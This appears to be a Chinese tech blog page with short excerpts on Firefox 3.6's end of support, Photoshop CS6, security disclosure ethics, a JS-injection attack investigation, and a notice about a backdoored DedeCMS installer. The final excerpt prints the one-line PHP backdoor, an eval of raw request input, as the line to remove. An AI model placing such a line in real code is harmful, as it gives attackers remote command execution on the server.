其firebug插件为开发提供了高效有利的保障.
3.6的火狐也是一个颇具争议的版本,其实也是支持插件最多的一个版本(我自己下载的插件测试就有500多个)
经过两年的常规更新,Mozilla宣布将在4月24日停止对Firefox 3.6的支持。如果不出现重大的安全或稳定性问题,本月初发布的Firefox 3.6.28就是最后一版Firefox 3.6。
Firefox 3.6用户自4月24日之后将不会再收到任何安全更新,因此官方建议大家下载最新的Firefox 11。
除了Firefox 3.6的停止更新,Mozilla还宣布,Firefox对系统的最低要求从Windows 2000升至Windows XP SP2。
Firefox是一款定制性极佳的浏览器。目前火狐在全球浏览器市场份额排行第三,前两位分别是IE浏览器与Chrome浏览器。
火狐浏览器11官方下载:http://www.firefox.com.cn/download/
今天起来看微博,都在讨论对于信息安全事故的一些探讨。
事件引发:dedecms内容管理系统被植入一句话后门,织梦官方否定了乌云对其cms的漏洞报告,并且偷偷的修复了漏洞;
本人不才,不是什么大牛,在这里和大家分享一下自己的思路和想法。
安全研究人员:@QzqZQZqz说:
看见最近圈里大家在说漏洞有偿无偿且和道德挂钩讨论,想起某朋友几年前在一安全大会说过咱和国外的安全研究人员没法比,老外衣食住无忧,安全研究挖个漏洞纯粹是兴趣爱好外加成就感,现在看老外的调调好像也没到衣食无忧的境界。安全漏洞是有绝对经济价值的,与道德无关,很多人就是无知。
对于这点,其实国内没办法和国外相提并论,国外提倡自由,很多东西,不是国内能匹敌。而且拿国外的安全人员和国内的比,也没有可比的意义。
对于技术来说,国内与国外完全是两个阶层:在这里打住(本人没有任何看不起国内安全研究人员的意思,还是那句话,清晰的目标很重要)。
在国外,更多的安全研究人员是注重漏洞发掘,而不是对漏洞拥有的一种炫耀。在国内,更多的hacker是对技术一种崇拜,真正做到淡泊名利,一心研究技术的人,可以说是很少。 继续阅读
3月22日消息,据国外媒体报道,Adobe周三晚间发布了Photoshop CS6的免费测试版,增加了简单的3D特性,并可以改变图片的位置、颜色、质感、影子及光源等,并且能进行实时处理。另外,界面也经过了重新设计。
据悉,Photoshop CS6的预览版可在Adobe Labs网站上下载。该软件的OS X版本可供免费下载,大小为984MB。
2010年4月,Aodbe公司发布了Adobe Creative Suite5产品系列。据该公司称,即将到来的图片编辑应用程序版本的亮点包括新的内容感知补丁、极快的性能、一个黑暗背景的用户界面以及新的、重新设计的设计工具。界面一改原来浅灰色调而采用了更暗的色调,旨在让用户工作时可以专注于图形的处理。该软件将搭载新的Adobe Mercury Graphics Engine,大大提升了软件运作的性能,编辑工具能产生“即时效果”。
Adobe创意媒体解决方案产品副总裁温斯顿·亨德里克森(Winston Hendrickson)在一份声明中表示:“PhotoshopCS6的将是一个具有里程碑意义的版本,以惊人的速度和性能推动成像创新的界限。” 继续阅读
文章来源:知道创宇
当一个流行的Web应用漏洞碰到充满想象力的Web Hackers,会产生什么化学效应?
By GreySign@Yunnan:2012/3/20
我们常常听闻各种Web漏洞被发现、被利用、被大肆宣传,或许安全厂商们都多多少少有点让用户们觉得这只是恐吓营销的手段,
但我们从不这么认为。
从我们的团队创立至今,分析、深入追踪过的案例大大小小已经数不清,但我们也相信,这些被发现的精彩的大规模攻击、APT攻击(当最初我们看到各种高级攻击的时候,还不知道如何称呼它们)只是冰山一角,浮出水面的每个事件,在经过各位安全研究员的深入分析,都足以拍成一部电影。
Anonymous对全球白帽子下了3月31日瘫痪DNS根服务器的挑战书的时候,我相信在这个互联网上大隐于市的高手们经已蓄势待发,默默捍卫承载着无数梦想的国度。与此同时,我们也在贡献着力所能及的微薄力量,时刻响应来自客户、来自国家、来自互联网那些需要我们帮助的安全事件。
在最近一段时间,我们发现了一个大规模攻击,与各位共享一下这个有意思的追踪过程。
最初的时候,我们发现客户的网站的js里都嵌入了一段加密后的脚本,虽然加密、压缩、代码混淆也时常是JS开发者压缩代码、保护代码的手段,
不过仔细看看解密后的代码,往往会有一些精彩的故事在里面。
用浏览器或其他工具看客户网站上的脚本(如:http://a.com/wp-includes/js/jquery/jquery.js?ver=1.6.1),在文件底部发现:
此时,我顺便看了看其他存放在本站的脚本文件,也全部被感染,插入了一样的脚本,
看上去这像是自动化的批量插入的代码,我对它进行了解密: 继续阅读
织梦内容管理系统一直以方便快捷强大而著称,但是这次..就连官网也受到影响…
最新消息,其实我是在微博上看到有人发布了这个消息。
织梦V5.7SP1版本安装包内被人植入了一句话木马。
我自己亲自去测试了一下,果真,被人植入了一句话木马。
所幸的事,我管理的两个网站并没有被植入(是因为之前早些日子被下载的原因吧!)
木马位置在uploads->include->shopcar.class.php文件中的第32行。
连官网都被日了- -最近下载了织梦并且传上服务器的朋友,要小心了。。
修复方案:删除@eval(file_get_contents(‘php://input’)),以及针对服务器进行全面的扫描杀毒。